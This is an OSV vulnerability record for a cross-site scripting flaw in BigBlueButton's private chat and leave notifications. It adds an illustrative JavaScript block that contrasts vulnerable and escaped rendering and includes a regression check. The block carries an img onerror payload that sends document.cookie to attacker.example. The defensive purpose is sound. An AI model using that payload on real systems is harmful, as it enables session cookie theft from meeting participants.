CVE-2022-31065

Source
https://cve.org/CVERecord?id=CVE-2022-31065
Import Source
https://storage.googleapis.com/cve-osv-conversion/osv-output/CVE-2022-31065.json
JSON Data
https://api.osv.dev/v1/vulns/CVE-2022-31065
Aliases
  • GHSA-8m2p-7qv3-qff7
Published
2022-06-27T19:45:21Z
Modified
2026-04-10T04:47:44.960161Z
Severity
  • 6.5 (Medium) CVSS_V3 - CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L
Summary
Cross site scripting vulnerability for private chat in bigbluebutton
Details

BigBlueButton is an open source web conferencing system. In affected versions an attacker can embed malicious JavaScript in their username and have it executed on a victim's client. The script runs when a user receives a private chat message from the attacker (whose username contains the JavaScript), and runs again when the victim receives the notification that the attacker has left the session. Any authenticated participant can set their own display name, so the only privilege required is a seat in the meeting (PR:L in the vector above), and the victim needs to do nothing beyond receiving the message or notification (UI:R covers the attacker having to send the private chat). This issue has been patched in versions 2.4.8 and 2.5.0. There are no known workarounds for this issue.
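The pattern behind this CWE-79 finding, shown as an added example that is not BigBlueButton's code: a display name supplied by one participant is interpolated into notification markup that another participant's browser renders. The page does not say which BigBlueButton render path was unescaped, so the function names, the toast markup and the attacker payload below are all assumptions constructed for illustration. The block shows the vulnerable string-building form, the escaped form that covers both notification paths named in the advisory (private chat and "left the session"), and a regression check a test suite could keep.

```javascript
// Added example (not BigBlueButton code): unsafe interpolation of a
// user-controlled display name into notification HTML, beside the fix.
// Function names and markup are hypothetical; the page does not state
// which BigBlueButton component rendered the name.

// Constructed attacker display name.  An event handler on a broken image
// fires without a <script> tag, so a filter that only strips <script>
// would not stop it.
const ATTACKER_NAME =
  '<img src=x onerror="fetch(\'https://attacker.example/?c=\'+document.cookie)">';

// Escape the five HTML-significant characters before untrusted text is
// placed into markup.  Covers text nodes and quoted attribute values.
function escapeHtml(s) {
  return String(s)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// Vulnerable: the display name is concatenated straight into HTML that the
// client later assigns to innerHTML (or renders via dangerouslySetInnerHTML).
// Both notification kinds from the advisory go through the same template.
function renderNotificationVulnerable(kind, userName) {
  const text = kind === 'private-chat'
    ? `New private message from ${userName}`
    : `${userName} has left the session`;
  return `<div class="toast">${text}</div>`;
}

// Fixed: the untrusted field is escaped at the point it enters markup.
// The template is trusted; the name never is, regardless of which
// notification path carries it.
function renderNotificationSafe(kind, userName) {
  const safeName = escapeHtml(userName);
  const text = kind === 'private-chat'
    ? `New private message from ${safeName}`
    : `${safeName} has left the session`;
  return `<div class="toast">${text}</div>`;
}

// Regression check: true when the raw user string survived into the output
// and that output contains an element carrying an on* event handler.
function leaksMarkup(html, userName) {
  return html.includes(userName) && /<[a-z]+[^>]*\bon[a-z]+\s*=/i.test(html);
}

// Stand-alone demonstration of both paths with the constructed name.
for (const kind of ['private-chat', 'left']) {
  const bad = renderNotificationVulnerable(kind, ATTACKER_NAME);
  const good = renderNotificationSafe(kind, ATTACKER_NAME);
  console.log(kind, 'vulnerable leaks markup:', leaksMarkup(bad, ATTACKER_NAME));
  console.log(kind, 'fixed leaks markup:', leaksMarkup(good, ATTACKER_NAME));
}
```

Escaping at render time is the fix that matches the advisory's scope; validating display names server side (rejecting `<` and `>`, for instance) is only defense in depth, because the same name reaches more than one render path and any path that forgets to escape is exploitable again.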

Database specific
{
    "cwe_ids": [
        "CWE-79"
    ],
    "cna_assigner": "GitHub_M",
    "osv_generated_from": "https://github.com/CVEProject/cvelistV5/tree/main/cves/2022/31xxx/CVE-2022-31065.json"
}
References

Affected packages

Git / github.com/bigbluebutton/bigbluebutton

Affected ranges

Type
GIT
Repo
https://github.com/bigbluebutton/bigbluebutton
Events

Affected versions

v2.4.0
v2.4.1
v2.4.2
v2.4.3
v2.4.4
v2.4.5
v2.4.6
v2.4.7

Database specific

source
"https://storage.googleapis.com/cve-osv-conversion/osv-output/CVE-2022-31065.json"